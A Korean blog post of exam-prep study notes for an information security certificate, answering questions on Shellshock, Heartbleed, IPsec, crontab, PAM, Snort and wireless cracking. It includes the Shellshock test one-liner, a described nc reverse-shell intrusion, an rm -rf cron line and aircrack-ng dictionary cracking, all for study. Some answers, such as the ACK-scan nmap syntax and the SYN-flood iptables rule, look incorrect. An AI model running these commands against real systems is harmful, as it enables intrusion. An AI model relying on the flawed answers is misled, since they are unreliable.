2- 리버스 접속이 가능한 nc를 이용해서 외부에 노출된 http 포트로 접속하여 bash 쉘을 실행한다.
이로 인해 외부에 노출된 http 포트를 통한 bash쉘을 실행하고 변조된 패스워드 파일을 이용하여
시스템 무단 침입이 가능하다.
84) $ env x='( ){ : ; }; echo test' bash -c "echo this is vulnerable"
1-해당 취약점 명은 무엇인가 : bash shell shock
2-위 명령 실행시 취약점 존재 시 나타나는 결과 및 이유 설명
취약점 존재 시 this is vulnerable이라고 출력된다,
이유는 이 취약점은 함수 추가 정의 기능을 이용한 취약점으로 () {로 시작하는 함수 선언문
끝에 명령어를 삽입해서 환경변수에 저장 시 끝에 작성한 명령어가 실행되는 것이다.
취약한 CGI 설정을 가진 웹서버의 경우 더욱 취약할 수 있다.
85) 라우터 보안 설정 구문 작성
1-enable 패스워드를 암호화하여 저장하는 구문 enable secret
2-사용자 계정 패스워드를 암호화하여 저장하는 구문 service password-encryption
86) IPSEC의 전송모드와 터널모드를 ESP Header를 중심으로 2가지 모드에 대해 비교설명
전송모드는 ip payload만 esp헤더로 암호화 하여 전송하기 때문에 트래픽 경로가 노출되는 반면
터널모드는 모든 패킷을 암호화 하여 전송하기 때문에 트래픽 경로가 노출되지 않는다.
87) 파일 업로드 취약점 점검 및 대응방법에 대해 설명
취약점 점검 - jsp나 php와 같은 파일 업로드 되어서 실행 되는지, 경로순회 기능 활성화 되어 있는지
대응법 - jsp나 php와 같은 확장자를 가진 파일 업로드 차단 및 경로순회 기능 비활성화, 웹상에서 실행할수 있는
권한 삭제
88) 디지털 포렌식에서 연계보관성 원칙에 대해 설명하고 괄호 안 내용 작성
증거 수집 -> ( 이동 ) -> ( 보관 ) -> ( 분석 ) -> 법정제출
연계보관성 원칙 - 증거물을 처리하는 각각의 절차마다 담당자 및 책임자 지정이 명확해야 한다.
89) OpenSSL 라이브러리 취약점명과 대응방안 설명
heartbeat 취약점, openssl 버전을 1.0.1g 이상의 버전으로 업데이트한다. 또한, 이미 구버전을 사용했을 경우
SSL 키가 노출되었을 수 있으므로 SSL 키를 재발급한다.
90) crontab 관련 질문
1- 현재 스케줄링 되어있는 작업 출력하는 명령 구문 crontab -l
2- Daniel 계정의 crontab을 편집하는 명령어 crontab -u Daniel -e
3- 매주 일요일 10시에 rm -rf 명령어를 통해 /tmp 디렉터리 하위의 모든 파일과 디렉터리를 삭제하는 crontab 스케줄을 작성
0 10 * * 0 rm-rf /tmp/* 1> /dev/null2 > &1
91)KISA ISMS 인증을 획득하기 위한 정책의 승인 요건을 기술
정보보호 정책 제개정 후 이해관련자의 검토 작업 수행
정보보호 정책 제개정시 최고경영자의 승인
정책시행 문서 제개정시 CISO의 승인
92)공인인증서의 효력이 소멸하는 4가지 사유
공인인증서의 폐지
공인인증서의 효력 정지
공인인증서의 만료
공인인증기관의 지정 취소
93)xinetd.conf 설정값 의미
1- cps= 10 5 : 들어오는 접속 수 제한, 10만큼 접속수 되었을때 5초간 서비스 비활성화
2- instances = 50 : 동시에 서비스를 실행할 수 있는 서버의 최대 개수
3- per_source = 10 : 동시에 접속 가능한 수
94)솔라리스 기반의 드라이버 파라미터 출력하거나 설정시 사용하는 ndd 명령어 이용 특정
해킹공격 차단 설정이다. 차단하려는 공격 명과 명령구문의 의미 작성
1-ndd -set /dev/ip ip_forward_directed_broadcasts 0
smurf 공격 차단, directed broadcast 패킷이 포워딩 되는것을 방지
2- ndd -set /dev/tcp tcp_conn_req_max_q0 1024
tcp syn flooding 공격 차단 , tcp 연결 요청 대기 큐를 1024로 증가한다.
95) FTP에서 파일이 보이지 않는 현상 발생 했을때
1- 해당 FTP 동작모드 : active 모드
2- 서버의 20,21포트의 역할 : 21포트는 클라이언트가 사용할 포트를 서버측에 알려주고 서버의 20포트를 사용하여 클라이언트 접속
3- 파일이 안보이는 현상 발생 이유 및 조치방안 작성
20번 포트가 방화벽으로 차단되었기 때문에 발생하는 현상으로 20번 포트를 방화벽에서 허용하거나 혹은
ftp passsive 모드를 사용한다.
96) 이메일,질병,키 몸무게 를 수집한 어린이 스포츠클럽 개인정보 수집 이용 동의서에서 위반한 사항 제시
질병,키와 같은 민감한 정보는 개인정보 수집이 원칙상 금지되어있다, 또한, 만 14세 어린이의 경우 법정 대리인의
동의가 필요하다.
97) syn이 많이 날라온 공격의 이름과 대상 서버에서 발생하는 피해 상황 설명
및 iptables를 이용하여 해당 공격을 대응하기 위해 규칙 적용하는데 이 iptables 구문 작성
(해당 공격 패킷이 1초에 10회이상 발생시 차단)
syn flooding attack, tcp 연결 요청 대기 큐가 가득 차서 서버가 마비될 수 있다.
iptables -A INPUT -p tcp --dport 80 -m limit --limit 10/s -j DROP
98) VLAN 구성하는 4가지 방식에 대해 간략히 설명
프로토콜 방식 - 같은 프로토콜끼리 통신하는 방식
MAC주소 기반 방식 - MAC주소로 할당하는 방식, MAC주소를 전부 등록 관리해야한다.
네트워크 주소 기반 방식 - ip주소로 할당하는 방식
port 기반 방식 - 스위치 port를 VLAN에 할당하는 방식, 일반적
99) XSS와 CSRF 차이점 비교 설명
XSS는 악성 스크립트가 클라이언트 브라우저 단에서 실행되는 반면 CSRF는 악성 스크립트가 클라이언트 자신의 의지와는 무관하게 서버단에 요청하게 되는 방식이다.
100) ESM 시스템에 대해 설명하고 구성요소 3가지 나열
각종 보안 솔루션들을 하나로 통합한 통합보안관리시스템으로 관제대상시스템으로부터 보안 및 성능로그를 수집하여 일관된 보안정책을 가지고
모니터링을 수행한다.
구성요소 - ESM Agent , ESM Manager , ESM Console
101) airdump 문제 //354 페이지 참조
1- c 옵션의 의미 : 특정 무선네트워크 채널 번호
2 - airdump-ng , airplay-ng, aircrack-ng 도구에 대해 설명
airdump-ng : 무선 네트워크의 패킷을 수집하기 위한 도구
airplay-ng : 특정 무선 AP와 가상 연결을 생성하여 패킷을 전송하기 위한 도구
aircrack-ng : 무선 네트워크에 사용된 WEP,WPA-PSK 암호화 키를 크래킹 하기 위한 도구
3- 해당 공격의 목적
무선 네트워크 패킷 수집 및 분석하여 정보를 획득한 후 공격자의 pw.lst 패스워드 사전파일을 이용해 사전대입 공격으로
무선네트워크의 암호화 키를 크래킹 하기 위함
102) EF SLE 등 계산 문제ㅐ // 355페이지 참조
EF : 1% , SLE = 100억
ARO:0.2 , ALE=20억
103)아파치에서 htaccess 차단 구문 //362 페이지 참조
deny from 192.168.0.1
104) IDS와 IPS 개념 및 차이점
IDS - 침입탐지 시스템으로 주로 미러링 형태로 설치되며 통신 트래픽을 분석 및 탐지 후 연결을 해체시킨다.
IPS - 침입차단 시스템으로 주로 인라인 형태로 설치되며 유해 트래픽 분석 후 원천적으로 차단시킨다.
105) IPSEC 모드별 각 헤더 구성을 각각 설명
전송 모드
ESP : IP Header - ESPHeader - IP Payload - ESP Trailer - ESP Auth
AH : IP Header - AH - IP Payload
터널 모드
ESP:New IP Header - ESP Header - IP Header - IP Payload - ESP Trailer - ESP Auth
AH:New IP Header - AH - IP Header - IP Payload
106) heartbeat 취약점에 대한 내용 및 공격 형태 , 대응방안 제시
openssl 라이브러리에서 heartbeat라는 확장 모듈에서 클라이언트 요청 메시지 처리 시 데이터 길이를 검증하지 않아서
메모리에 저장된 64KB의 평문이 그대로 노출되는 취약점.
공격 형태 - 메시지 길이 정보가 변조된 heartbeat request 패킷을 취햑한 openssl 버전을 사용하는 서버에 전송한다.
대응 방안 - openssl 버전을 1.0.1g 이상의 버전으로 업데이트 하고, 기존의 구 버전을 사용했을 경우
ssl 키가 노출되었을 수 있으므로 ssl 키를 재발급 받아야 한다.
107) arp 스푸핑 mac 주소 문제 //364 페이지
108) Googlebot이 사용하는 webrobot에 대해 설명하고 이를 차단하기 위한 방안 제시
로봇배제프로토콜이라 하며, 로봇이 웹사이트에 접근하는 것을 방지하기 위한 규약으로 접근제한에 대한 것을 robots.txt에 기술하였다.
차단 방안 - robots.txt에 구문을 아래처럼 변경한다.
User-agent:*
Disallow: /
109) PAM 설정 내용이다 아래 설정 옵션에 대해 설명
1- deny=5 - 5회 틀릴 시 계정 잠금
2- unlock_time=120 - 120초 뒤 계정 잠금 풀린다.
3- no_magic_root - root 계정 잠금 설정 비활성화
4- reset - 접속 성공 후 틀린 횟수 초기화
110) /etc/shadow 관련 //371 페이지
a-암호 알고리즘 b-salt값 c-패스워드 해시
2.레인보우 테이블을 이용한 공격 대응할수있는 salt값 설정에 대해 설명
레인보우 테이블은 자주 사용하는 패스워드 해시를 모아놓은 테이블인데 salt값을 추가해서 자주 사용하는 패스워드 해시를
변경해서 패스워드 추측 공격을 막을 수 있다.
3. pwconv와 pwunconv 차이점
pwconv는 /etc/passwd 방식을 /etc/shadow로 변환해주며, unconv는 그 반대
111)벨라파둘라에서 no read up과 no write down에 대해 설명하고 비바 정책에 대해서도 설명
no read up - 낮은 등급의 주체가 높은 등급의 객체를 읽을 수 없다.
no write down - 높은 등급의 주체가 낮은 등급의 객체를 수정할 수 없다.
비바
no write up
no read down
112)Flag[ACK] 스캔을 한 스캐닝 종류와 목적 설명, 이에 대한 nmap 구문 작성
TCP ACK 스캐닝을 한 것이며 방화벽에 의해 패킷이 차단되는지 확인하기 위한 목적이다.
nmap -PT 10.10.10.1
113) Apache 설정파일중 각 설정에 대한 설명
1-Keepalive on : KeepAlive 옵션을 활성화 (웹서버 속도 향상)
2-Maxkeepaliverequests 100 - keep alive를 허용하는 최대 사용자 수를 100명으로 설정
3-keppalivetimeout 100 - keep alive를 유지시키는 시간을 100초로 설정
4-directoryindex index.htm index.html - 홈 디렉터리에서 기본 파일 우선순위를 설정하는 것으로 index.htm에서 index.html 순으로 우선순위 부여
5-customlog /www/logs/access_log common - 로그 파일은 /www/logs/access_log 에 저장되며, 로그 포맷은 기본 로그 포맷 사용한다.
114)snort 관련 //373페이지
1- 1바이트를 띄고 3바이트 길이만큼 검사하는데 "GET" 문자열 트래픽을 탐지한다.
2 - 직전에 탐지한 위치에서 1바이트 다음에 있는 /login.php.... 컨텐츠 트래픽을 탐지한다.
3 - 대소문자 구분을 하지 않기 위해서 nocase 옵션을 추가해 준다. 즉, XSS"; nocase; distance 1;
'8. 정보보안 노트 정리' 카테고리의 다른 글
| PCAP 파일 및 멀웨어 소스 제공 사이트 (0) | 2023.12.26 |
|---|---|
| 침입탐지, 보안 모니터링, 로그 관리를 하는 Security Onion 설치 (0) | 2023.12.26 |
| 해시값 크래킹 사이트 크랙 스테이션 (0) | 2023.12.11 |
| GDB, 레지스터 등 정리 (1) | 2023.12.11 |
| 포맷스트링 공격 정리 (1) | 2023.12.11 |
